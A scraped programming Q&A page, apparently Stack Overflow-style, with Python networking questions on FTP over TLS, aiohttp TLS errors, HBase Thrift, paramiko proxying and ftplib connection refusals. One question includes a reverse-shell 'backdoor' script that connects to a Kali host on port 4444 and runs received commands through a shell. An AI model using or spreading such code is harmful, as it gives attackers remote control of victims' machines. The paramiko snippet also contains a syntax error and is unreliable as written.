I'm trying to setup an FTP TLS transfer. I have scripts for strict FTP and for SFTP, but this is my first exposure to TLS. My basic script:
import ftplib
import ssl
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1_2)
ftps = ftplib.FTP_TLS(context=ctx)
print (ftps.connect(myhost,21))
print(ftps.login(myusername,mypwd))
print("1")
ftps.prot_p()
print("2")
print (ftps.retrlines('LIST'))
print("3")
Error:
[WinError 10054] An existing connection was forcibly closed by the remote host
This error occurs at the retrlines line. It says the error is in ssl.py at do_handshake self._sslobj.do_handshake().
I've already verified the connection with WinSCP, and that the protocol is TLS1.2.
Any ideas?
Well, the issue turned out to be that the vendor was only allowing access from a specific machine. Once I tried the script on the correct machine, it worked.
Related
I am creating a backdoor project for fun and I ran into an error that I cant fix so here is the code:
#!/usr/bin/python
import socket
import subprocess
def execute_system_command(command):
return subprocess.check_output(command, shel=True)
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect(("VMKaliIP",4444))
connection.send("connected")
while True:
command = connection.recv(1024)
command_result = execute_system_command(command)
connection.send(command_result)
connection.close()
The error I get: [WinError 10060] A connection attempt failed because the connected party did not properly
respond after a period of time, or established connection failed because connected host has failed to respond
so I run NetCat on my virtual Kali machine on port 4444 but I get nothing back.
Any Ideas?
Background: I'm writing a web server using aiohttp with a websocket endpoint at /connect. The app was originally served via HTTP (and clients would connect to ws://host/connect). This worked locally using localhost, but when I deployed to Heroku, the app was served via HTTPS and it didn't allow clients to connect to an insecure websocket. Therefore, I tried to change my server so that it would use HTTPS locally. Now the client can't even complete the TLS handshake with the server. Here is my setup:
server.py
from aiohttp import web
import ssl
app = web.Application()
app.router.add_get('/', handle)
app.router.add_get('/connect', wshandler)
ssl_context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
ssl_context.load_default_certs()
web.run_app(app, port=8443, ssl_context=ssl_context)
# web.run_app(app, port=8443) # original
When I run the server and try to navigate to https://localhost:8443/ (using Chrome 80), I get the following traceback:
Traceback (most recent call last):
File "/Users/peterwang/anaconda3/lib/python3.7/asyncio/sslproto.py", line 625, in _on_handshake_complete
raise handshake_exc
File "/Users/peterwang/anaconda3/lib/python3.7/asyncio/sslproto.py", line 189, in feed_ssldata
self._sslobj.do_handshake()
File "/Users/peterwang/anaconda3/lib/python3.7/ssl.py", line 763, in do_handshake
self._sslobj.do_handshake()
ssl.SSLError: [SSL: NO_SHARED_CIPHER] no shared cipher (_ssl.c:1056)
I looked at ssl_context.get_ciphers() and found that it does include the ciphersuites that Chrome 80 uses also with TLS1.3. I also used Wireshark to trace the communication between the client and my server. I see the TLS Client Hello, which says that it handles TLS1.0 through TLS1.3 and is compatible with a multitude of ciphers that overlap with ssl_context.get_ciphers(). There is no response from the server.
Does anyone have any advice? (I am using Python 3.7, OpenSSL 1.1.1d, and aiohttp 3.6.2)
A SSL server has to to be configured to use a certificate matching the servers domain and the associated private key, typically using load_cert_chain. Your server is not configured to use a server certificate and key and thus cannot offer any ciphers which requires this - which means it can not offer any ciphers which are typically expected by the client. This means there are no shared ciphers, hence this error.
I'm trying to work with Hbase, thrift, and python on a remote machine(Ubuntu) from Eclise RSE on windows. Everything is working fine but when I'm trying to connect to the localhost I get an error:
thrift.transport.TTransport.TTransportException: Could not connect to localhost:9090
If I run this code via ssh terminal on a remote machine, it works perfectly.
Here is my code:
#!/usr/bin/env python
import sys, glob
sys.path.append('gen-py')
sys.path.insert(0, glob.glob('lib/py/build/lib.*')[0])
from thrift import Thrift
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from hbase import Hbase
# Connect to HBase Thrift server
transport = TTransport.TBufferedTransport(TSocket.TSocket('localhost', 9090))
protocol = TBinaryProtocol.TBinaryProtocolAccelerated(transport)
# Create and open the client connection
client = Hbase.Client(protocol)
transport.open()
tables = client.getTableNames()
print(tables)
# Do Something
transport.close()
Do you know what localhost means? It means the machine you're running the command on. E.g. if I type http://localhost:8080/ in a browser on my PC then it will call the server running on port 8080 on MY machine.
I'm sure your connection worked fine if you tried connecting to localhost while on the same box. If connecting from a different machine then you'll need to know the IP address or the hostname of the box you're connecting to.
I'm trying to connect to SSH server in the following way:
import paramiko
import socks
sock = socks.socksocket()
sock.setproxy(socks.PROXY_TYPE_SOCKS5, 'localhost', 22, True)
sock.connect((**IP address of SSH server**, 22))
t = paramiko.Transport(sock)
t.connect( None, 'username', 'password')
And get the following error
> Traceback (most recent call last): ...
> sock.connect((**IP address of SSH server**, 22)) File "C:\Python27\lib\site-packages\socks.py", line 368, in connect
> _orgsocket.connect(self,(self.__proxy[1],portnum)) File "C:\Python27\lib\socket.py", line 224, in meth
> return getattr(self._sock,name)(*args) socket.error: [Errno 10061] No connection could be made because the target machi ne actively
> refused it
My goal is to simulate Putty's way in creating SSH SOCKS Proxy as here:
Configure PuTTY To Create SSH SOCKS Proxy For Secure Browsing.
Or equivalent
ssh -D [localhost]port
for local dynamic application-level port forwarding.
Can someone explain, please, what's wrong and how to do it the right way using paramiko?
Thanks.
P.S.
I've found this https://stackoverflow.com/a/5823383/1264304 However, I don't succeed to implement it. Someone?
Paramiko can natively connect to ssh. You don't need the SOCKS library to connect to the ssh server. Additionally, when you try, the remote server refuses to connect because you don't authenticate.
The proper way to do this would be to connect with paramiko's sshClient:
import paramiko
ssh = paramiko.SSHClient()
ssh.connect('yourServer', username='you',
password='yay!')
And then, get the underlying transport:
trans = ssh.get_transport()
Finally, have the ssh client forward a tcp port with open channel:
trans.open_channel("forwarded-tcpip", dest_addr=('serverIP',8000), src_addr=('localhost'),8000))
This will cause any connections on port 8000 locally to be forwarded to port 8000 remotely across this ssh session.
I have created an FTP client using ftplib. I am running the server on one of my Ubuntu virtual machine and client on another. I want to connect to the server using ftplib and I'm doing it in the following way:
host = "IP address of the server"
port = "Port number of the server"
ftpc = FTP()
ftpc.connect(host, port)
I'm getting the following error!
Traceback (most recent call last):
File "./client.py", line 54, in <module>
ftpc.connect(host, port)
File "/usr/lib/python2.7/ftplib.py", line 132, in connect
self.sock = socket.create_connection((self.host, self.port), self.timeout)
File "/usr/lib/python2.7/socket.py", line 571, in create_connection
raise err
socket.error: [Errno 111] Connection refused
When I went through the docs of python, I could see ftplib used only with domain names as in FTP("domain name"). Can I use IP address instead of domain name? In my case I am unable to comprehend the error. It would be great if anyone can help me out.
Also if I use port 21 on my server, I'm getting socket error: Connection refused. How do I use port 21 for my FTP server?
Thank You.
It seems like you are trying to connect to SFTP server using ftplib which is giving you the Connection Refused error. Try using pysftp instead of ftplib and see if it works.
On the virtual machine, test by typing ftp and sftp commands on the console. You will get to know on which server the machine is running i.e ftp or sftp.
To solve the problem, I install and config vsftpd:
sudo apt install vsftpd (if not exist)
sudo vim /etc/vsftpd.conf
set "listen=YES"